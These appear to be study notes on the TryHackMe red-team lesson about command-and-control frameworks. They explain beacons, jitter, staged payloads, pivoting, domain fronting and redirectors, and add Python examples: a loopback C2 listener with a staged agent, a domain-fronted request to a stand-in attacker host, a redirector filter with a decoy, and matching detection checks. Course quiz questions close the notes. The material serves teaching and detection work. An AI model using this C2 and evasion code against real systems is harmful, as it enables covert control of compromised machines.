Introduction

We covered an introduction to C2 servers. We explained C2 agents, payloads and their types (staged vs stageless), droppers and beacons, as well as C2 agent obfuscation methods. We also covered some of the popular C2 frameworks, including but not limited to Metasploit, PowerShell Empire, Armitage and Cobalt Strike. This was part of the TryHackMe red team pathway.

The various components of a C2 framework can look intimidating at first, but they don’t have to be. At its most basic level, think of a C2 framework as a Netcat listener (the C2 server) that can handle many reverse shells calling back at once (the C2 agents): a server for reverse shells. Unlike Netcat, almost all C2 frameworks need a dedicated payload generator, and this is usually built into the framework itself. Metasploit, for example, is a C2 framework with its own payload generator, msfvenom.

So what exactly makes a C2 framework better than a plain Netcat listener? It looks as though adding session management to Netcat would give you the same thing. Up to a point that is true, but C2 frameworks shine in their post-exploitation features: tasking many agents from one console, built-in credential dumping and pivoting modules, and beaconing options that make the callbacks harder to spot.

Understanding C2 Servers

A C2 framework is a system that lets an attacker (me, the operator) communicate with and control many compromised victim machines from one place. Think of it as the central hub for my operations. It is far more scalable and flexible than managing numerous targets through individual Netcat sessions, which quickly becomes unmanageable.

Here are the key components of a C2 setup:

  • C2 Server: My central hub, where I plan and execute operations, generate payloads (agents) and manage all communication with the victim machines.
  • Agents/Payloads: The software (an .exe, a PowerShell script and so on) that I generate on the C2 server and deliver to a victim machine. Once executed, the agent calls back to my C2 server, sends information about the host and receives commands (tasks) to run.
  • Listeners: The component on my C2 server that waits for incoming connections (callbacks) from agents, usually one listener per transport such as HTTP(S), DNS or SMB. Without a matching listener, the agent has nothing to talk to.
  • Beacons: The periodic check-in messages an agent sends to my listener (and the responses that carry its tasks). The interval between two beacons is the agent’s sleep timer.

Evading Detection

Security solutions and network defenders are always trying to spot malicious C2 communication, and a fixed-rate callback is one of the easiest things for them to find. To make the beaconing less obvious, I use a couple of options:

  • Sleep Timers: Instead of holding a constant connection, my agents beacon to the C2 server at a set interval (e.g. every 5, 10 or 15 seconds in a lab; in a real engagement more often minutes or hours).
  • Jitter: A random variation applied to the sleep timer, usually configured as a percentage of it, so consecutive callbacks are not evenly spaced. For example, an agent might call back after 5 seconds, then 15 seconds, then 3 seconds. This breaks the predictable, metronome-like pattern that network monitoring or antivirus tooling might flag. Jitter hides regularity, not volume: the number of connections to one unusual destination is still visible, which is why analysts look at both.
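
To see how a sleep timer and jitter play out on the wire, and why jitter alone does not make an agent invisible, here is an added Python example (not code from the page or from any of the frameworks it names). The agent side computes a jittered delay from a sleep timer and a jitter percentage; the defender side parses constructed connection-log lines, computes the coefficient of variation of each flow’s inter-arrival times and flags flows that are too regular. Symmetric jitter around the sleep timer, the log line format and the 0.1 threshold are all assumptions of this example.

```python
"""Sleep timer and jitter on the agent side, and the inter-arrival check a
defender runs over connection logs. Added example; log lines are constructed."""
import random
import statistics


def next_sleep(sleep_seconds, jitter_percent, rng):
    """Delay before the next beacon: the sleep timer varied by up to +/- jitter %.
    (Symmetric jitter is an assumption of this example; frameworks differ in
    whether jitter only shortens the sleep or varies it both ways.)"""
    if not 0 <= jitter_percent < 100:
        raise ValueError("jitter must be a percentage in [0, 100)")
    spread = sleep_seconds * jitter_percent / 100.0
    return sleep_seconds + rng.uniform(-spread, spread)


def beacon_times(sleep_seconds, jitter_percent, count, seed=0):
    """Simulate `count` callbacks; returns seconds-from-start of each one."""
    rng = random.Random(seed)
    t, times = 0.0, []
    for _ in range(count):
        t += next_sleep(sleep_seconds, jitter_percent, rng)
        times.append(t)
    return times


def make_log(src, dst, sleep_seconds, jitter_percent, count, seed=0):
    """Constructed connection-log lines '<epoch> <src> <dst>' for one beaconing agent."""
    start = 1_700_000_000
    times = beacon_times(sleep_seconds, jitter_percent, count, seed)
    return [f"{start + t:.0f} {src} {dst}" for t in times]


def parse_log(lines):
    """Group timestamps by (src, dst) flow."""
    flows = {}
    for line in lines:
        ts, src, dst = line.split()
        flows.setdefault((src, dst), []).append(float(ts))
    return flows


def beacon_score(timestamps, min_connections=8):
    """Coefficient of variation (stdev/mean) of inter-arrival times.
    0.0 means perfectly periodic; None if there are too few connections to judge."""
    if len(timestamps) < min_connections:
        return None
    ts = sorted(timestamps)
    deltas = [b - a for a, b in zip(ts, ts[1:])]
    mean = statistics.fmean(deltas)
    return statistics.pstdev(deltas) / mean if mean > 0 else None


def find_beacons(lines, max_cv=0.1):
    """Flows whose timing is regular enough to look like a beacon: {flow: cv}."""
    hits = {}
    for flow, ts in parse_log(lines).items():
        cv = beacon_score(ts)
        if cv is not None and cv <= max_cv:
            hits[flow] = cv
    return hits


# Constructed traffic: one agent with no jitter, one with 30 % jitter, and a
# user who hit the same update server three times at irregular intervals.
NO_JITTER = make_log("10.0.0.5", "203.0.113.10:443", 60, 0, 40)
WITH_JITTER = make_log("10.0.0.6", "203.0.113.10:443", 60, 30, 40, seed=7)
NOISE = ["1700000011 10.0.0.9 198.51.100.7:443",
         "1700000900 10.0.0.9 198.51.100.7:443",
         "1700003100 10.0.0.9 198.51.100.7:443"]

if __name__ == "__main__":
    for flow, cv in find_beacons(NO_JITTER + WITH_JITTER + NOISE).items():
        print(f"beacon-like: {flow} cv={cv:.3f}")
```

Run it and only the no-jitter agent is flagged (cv of 0.000); the 30 % jitter agent lands above the threshold. Both, however, still make forty connections to the same rare destination, which is the second thing a beacon hunter counts, so jitter should be paired with a realistic sleep and a destination that blends in.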

Payload Types

Payloads can be delivered in a couple of ways:

  • Stageless Payloads: The entire agent is generated on the C2 server and delivered to the victim workstation as one self-contained file that runs all at once. It is larger, but it needs no second download, so it still works if the staging server is unreachable later.
  • Staged Payloads: The payload is delivered in parts. First a small “dropper” (also called a stager) is sent to the victim; once executed, it makes an additional callback to the C2 server to request and download the rest of the payload, often straight into memory. Staged payloads are commonly preferred for antivirus evasion because the file that touches disk is tiny and contains little of the agent’s logic. The trade-offs are that the staging download is an extra network event a defender can see, and that the payload fails if the C2 server is unreachable at that moment.

Payloads can come in various formats, including executables (.exe), PowerShell scripts, HTA (HTML Application) files, Visual Basic scripts, and JavaScript files.
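
The components above (server, agent, listener, beacons) and the staged delivery just described come together in the following added Python example, which is not code from the page or from any real framework. It runs a loopback HTTP listener that serves a stage and hands out tasks, and a staged agent whose stager first fetches the stage and then beacons for tasks and posts results. The URIs (/stage, /beacon, /result), the agent ID and the task names are made up, and the stage here carries only the agent’s configuration rather than executable code, which keeps the demo harmless while still producing the extra staging callback a defender would see in a proxy log.

```python
"""A loopback C2 listener plus a staged agent: the stager fetches the rest of the
payload, then the agent beacons for tasks and posts results. Added example, not
code from the page or any real framework; URIs and task names are made up."""
import json
import platform
import threading
import time
import urllib.parse
import urllib.request
from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer

STAGE_PATH, BEACON_PATH, RESULT_PATH = "/stage", "/beacon", "/result"  # hypothetical URIs


class C2Listener(ThreadingHTTPServer):
    """Listener: serves the stage, hands out queued tasks, stores results."""

    def __init__(self, host="127.0.0.1", port=0):
        super().__init__((host, port), C2Handler)
        # The "rest of the payload". Here it only carries the agent's configuration;
        # a real stage would be the agent code itself, often loaded straight into memory.
        self.stage = json.dumps({"sleep": 0.01}).encode()
        self.tasks = {}     # agent id -> pending tasks
        self.results = {}   # agent id -> posted results
        self.requests = []  # request paths, as a proxy log would record them
        self.lock = threading.Lock()


class C2Handler(BaseHTTPRequestHandler):
    def log_message(self, *_):
        pass  # keep the demo quiet

    def _reply(self, body=b"", status=200):
        self.send_response(status)
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def do_GET(self):
        srv, url = self.server, urllib.parse.urlparse(self.path)
        agent_id = urllib.parse.parse_qs(url.query).get("id", [""])[0]
        with srv.lock:
            srv.requests.append(url.path)
            pending = srv.tasks.get(agent_id, [])
            task = pending.pop(0) if pending and url.path == BEACON_PATH else None
        if url.path == STAGE_PATH:
            self._reply(srv.stage)
        elif url.path == BEACON_PATH:
            self._reply(json.dumps({"task": task}).encode())
        else:
            self._reply(status=404)

    def do_POST(self):
        srv, url = self.server, urllib.parse.urlparse(self.path)
        agent_id = urllib.parse.parse_qs(url.query).get("id", [""])[0]
        body = self.rfile.read(int(self.headers.get("Content-Length", 0)))
        with srv.lock:
            srv.requests.append(url.path)
            if url.path == RESULT_PATH:
                srv.results.setdefault(agent_id, []).append(json.loads(body))
        self._reply(status=200 if url.path == RESULT_PATH else 404)


def run_task(task):
    """Harmless handler standing in for real post-exploitation modules."""
    if task == "sysinfo":
        return platform.platform()
    return f"unknown task: {task}"


def agent_loop(base_url, agent_id, config):
    """Beacon on the sleep timer until the listener sends 'exit'; returns the beacon count."""
    beacons = 0
    while True:
        with urllib.request.urlopen(f"{base_url}{BEACON_PATH}?id={agent_id}") as resp:
            task = json.load(resp)["task"]
        beacons += 1
        if task == "exit":
            return beacons
        if task is not None:
            out = json.dumps({"task": task, "output": run_task(task)}).encode()
            req = urllib.request.Request(f"{base_url}{RESULT_PATH}?id={agent_id}", data=out, method="POST")
            urllib.request.urlopen(req).close()
        time.sleep(config["sleep"])


def stager(base_url, agent_id):
    """First part of a staged payload: one extra callback fetches the stage, then it runs."""
    with urllib.request.urlopen(f"{base_url}{STAGE_PATH}") as resp:
        config = json.load(resp)
    return agent_loop(base_url, agent_id, config)


def run_demo():
    """Start a listener, queue two tasks for agent 'a1', run the staged agent."""
    listener = C2Listener()
    listener.tasks["a1"] = ["sysinfo", "exit"]
    threading.Thread(target=listener.serve_forever, daemon=True).start()
    try:
        beacons = stager("http://127.0.0.1:%d" % listener.server_address[1], "a1")
    finally:
        listener.shutdown()
        listener.server_close()
    return {"beacons": beacons, "requests": listener.requests, "results": listener.results["a1"]}


if __name__ == "__main__":
    print(json.dumps(run_demo(), indent=2))
```

The listener’s `requests` list is the part to look at: it records /stage before the first /beacon, which is exactly the second network event that distinguishes a staged payload from a stageless one on the wire, and the /beacon, /result, /beacon rhythm afterwards is the beaconing a sleep timer spaces out.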

C2 Server Modules & Capabilities

C2 frameworks offer powerful modules for post-exploitation and pivoting:

  • Post-Exploitation Modules: These let me interact with a compromised victim, enabling actions such as dumping hashes and credentials, enumerating the host and the network, and moving laterally to other machines.
  • Pivoting Modules: These are crucial for reaching parts of the network that are otherwise inaccessible to me. If I compromise a machine in one subnet, pivoting lets me reach machines in other, isolated subnets through it, using techniques such as SMB beaconing (agents in a restricted segment relay through an already-compromised host over SMB named pipes on TCP 139/445, so they never need direct internet access) and SSH tunneling.

Making the C2 Server Public (Facing the Internet)

If my attack has to be conducted from outside the target network, my C2 server must be reachable from the internet, and preferably not directly identifiable as mine:

  • Domain Fronting: This abuses a CDN or large proxy (Cloudflare is the example given) that fronts many customers’ domains. The TLS handshake’s SNI names an innocuous domain hosted on that CDN, while the HTTP Host header inside the encrypted tunnel names my own CDN-registered hostname, so observed traffic appears to go to the CDN and the innocuous domain rather than to my server. Several major CDNs now reject requests whose Host header does not match the SNI, so check whether a provider still permits it before relying on it; more commonly a redirector (a cheap VPS or CDN-fronted proxy) sits in front of the team server so that only the redirector’s address, never the C2’s, is exposed.
  • C2 Profiles: A profile (Cobalt Strike calls them Malleable C2 profiles) defines what the agent’s traffic looks like on the wire: URIs, HTTP headers, User-Agent and how task data is encoded. Besides blending in with legitimate traffic, a profile lets a redirector forward only requests that match it to the real C2 and send everything else, such as scanners or a curious analyst, to a decoy site.
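
As an added example (not the page’s code, and not any framework’s real profile syntax), the following Python block shows where the domain-fronting trick lives in a request, how a redirector uses a profile to decide what to forward, and the check a defender runs against a TLS proxy log. All hostnames are made up, the PROFILE dictionary is a hypothetical stand-in for a real C2 profile, and the log line format is constructed for the example.

```python
"""Domain fronting as a request shape, a profile-driven redirector rule, and the
SNI/Host check a defender runs. Added example with made-up hostnames; the profile
format is an assumption, not any framework's real profile syntax."""

# Hypothetical profile: the shape every agent request must have on the wire.
PROFILE = {
    "method": "GET",
    "uri": "/api/v1/status",
    "user_agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36",
    "headers": {"Accept": "application/json", "Cache-Control": "no-cache"},
    "data_header": "X-Request-Id",  # agent data (e.g. an encoded ID) rides in this header
}


def build_request(host, profile, data):
    """Raw HTTP/1.1 request text for a beacon that follows the profile."""
    lines = [f"{profile['method']} {profile['uri']} HTTP/1.1", f"Host: {host}",
             f"User-Agent: {profile['user_agent']}"]
    lines += [f"{name}: {value}" for name, value in profile["headers"].items()]
    lines.append(f"{profile['data_header']}: {data}")
    return "\r\n".join(lines) + "\r\n\r\n"


def fronted_request(front_domain, c2_host, profile, data):
    """Domain fronting: returns (sni, request). The TLS SNI names an innocuous site on
    the same CDN; the Host header, visible only inside the TLS tunnel, names the C2."""
    return front_domain, build_request(c2_host, profile, data)


def parse_request(raw):
    """Split raw request text into (method, uri, {lower-cased header: value})."""
    head = raw.split("\r\n\r\n", 1)[0]
    request_line, *header_lines = head.split("\r\n")
    method, uri, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, uri, headers


def redirector_accepts(raw, profile):
    """Redirector rule: forward to the team server only if the request matches the
    profile; anything else (scanners, a curious analyst) gets the decoy site."""
    method, uri, headers = parse_request(raw)
    if method != profile["method"] or uri != profile["uri"]:
        return False
    if headers.get("user-agent") != profile["user_agent"]:
        return False
    if profile["data_header"].lower() not in headers:
        return False
    return all(headers.get(n.lower()) == v for n, v in profile["headers"].items())


def sni_host_mismatches(log_lines):
    """Defender side: TLS-proxy log lines 'client=<ip> sni=<name> host=<name>' (constructed).
    A Host header that differs from the SNI is the fingerprint of domain fronting."""
    hits = []
    for line in log_lines:
        fields = dict(field.split("=", 1) for field in line.split())
        if fields["sni"].lower() != fields["host"].lower():
            hits.append((fields["client"], fields["sni"], fields["host"]))
    return hits


SAMPLE_LOG = [  # constructed proxy log
    "client=10.0.0.5 sni=www.shop.example host=www.shop.example",
    "client=10.0.0.7 sni=assets.innocuous.example host=c2-front.attacker.example",
]

if __name__ == "__main__":
    sni, raw = fronted_request("assets.innocuous.example", "c2-front.attacker.example", PROFILE, "a" * 32)
    print("SNI:", sni, "| redirector forwards:", redirector_accepts(raw, PROFILE))
    print("SNI/Host mismatches:", sni_host_mismatches(SAMPLE_LOG))
```

The two halves mirror each other: the operator relies on the Host header being invisible to anyone who only sees the TLS handshake, and the defender’s only vantage point for catching it is a TLS-terminating proxy that can compare SNI and Host for every connection. The redirector rule is what turns a profile from a disguise into an access control: a request that does not match it never reaches the team server.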

Examples of C2 Frameworks

I learned about several C2 frameworks, categorized by their availability:

  • Free/Open Source:
    • Metasploit: Primarily known as an exploitation framework, but it can also function as a C2 server (Meterpreter is its agent and msfvenom its payload generator).
    • Armitage: A graphical user interface (GUI) front-end for Metasploit, offering more visual and automated features.
    • PowerShell Empire: Heavily relies on PowerShell. The original project was discontinued, but it is still encountered, and a community fork is maintained by BC-Security.
    • Covenant: A .NET-based C2 framework; often used for pivoting and lateral movement.
    • Merlin/Sliver: More advanced frameworks, both written in Go, that obfuscate their communication by supporting several transport protocols and encryption.
  • Paid/Commercial:
    • Cobalt Strike: A very prominent and powerful commercial C2 server.
    • Brute Ratel: A commercial framework that provides an adversary emulation experience.

I also noted that there are websites, such as the C2 Matrix, where I can explore and compare even more C2 frameworks.

Future Content

I plan to cover Armitage installation and usage in the next video, and potentially PowerShell Empire and Covenant in subsequent videos. I also have personal OneNote notes on red teaming, covering theory, methodologies, and career aspects.

Technical Commands

This video was purely conceptual, explaining the components and functionalities of C2 servers, so no specific technical commands were typed into a terminal. The examples given, like payload.exe, were illustrative names for files rather than commands to be executed.

TryHackMe Red Team Track Answers

What is the term for the software on a compromised computer that communicates back to a command and control (C2) server?

What is the beaconing option that introduces a random delay value to the sleep timer?

What is the term for the first portion of a Staged payload?

What is the name of the communication method that can potentially allow access to a restricted network segment that communicates via TCP ports 139 and 445?

Which listener should you choose if you have a device that cannot easily access the internet?

Which listener should you choose if you’re accessing a restricted network segment?

Which listener should you choose if you are dealing with a Firewall that does protocol inspection?

About the Author

Mastermind Study Notes is a group of talented authors and writers who are experienced and well-versed across different fields. The group is led by Motasem Hamdan, who is a cybersecurity content creator and YouTuber.
